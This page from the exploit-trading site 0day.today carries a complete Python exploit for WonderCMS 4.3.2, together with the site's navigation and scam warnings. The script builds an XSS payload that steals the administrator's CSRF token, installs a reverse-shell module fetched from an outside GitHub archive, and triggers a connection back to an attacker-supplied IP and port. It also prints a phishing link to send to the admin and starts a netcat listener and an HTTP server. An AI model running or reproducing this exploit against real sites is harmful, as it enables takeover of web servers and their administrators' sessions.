0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Wondercms 4.3.2 - XSS to Remote Code Execute Exploit
# Author: prodigiousMind # Exploit: Wondercms 4.3.2 XSS to RCE import sys import requests import os import bs4 if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252") else: data = ''' var url = "'''+str(sys.argv[1])+'''"; if (url.endsWith("/")) { url = url.slice(0, -1); } var urlWithoutLog = url.split("/").slice(0, -1).join("/"); var urlWithoutLogBase = new URL(urlWithoutLog).pathname; var token = document.querySelectorAll('[name="token"]')[0].value; var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token; var xhr3 = new XMLHttpRequest(); xhr3.withCredentials = true; xhr3.open("GET", urlRev); xhr3.send(); xhr3.onload = function() { if (xhr3.status == 200) { var xhr4 = new XMLHttpRequest(); xhr4.withCredentials = true; xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php"); xhr4.send(); xhr4.onload = function() { if (xhr4.status == 200) { var ip = "'''+str(sys.argv[2])+'''"; var port = "'''+str(sys.argv[3])+'''"; var xhr5 = new XMLHttpRequest(); xhr5.withCredentials = true; xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port); xhr5.send(); } }; } }; ''' try: open("xss.js","w").write(data) print("[+] xss.js is created") print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3])) print("----------------------------\n") XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\"" XSSlink = XSSlink.strip(" ") print("send the below link to admin:\n\n----------------------------\n"+XSSlink) print("----------------------------\n") print("\nstarting HTTP server to allow the access to xss.js") os.system("python3 -m http.server\n") except: print(data,"\n","//write this to a file") # 0day.today [2024-07-05] #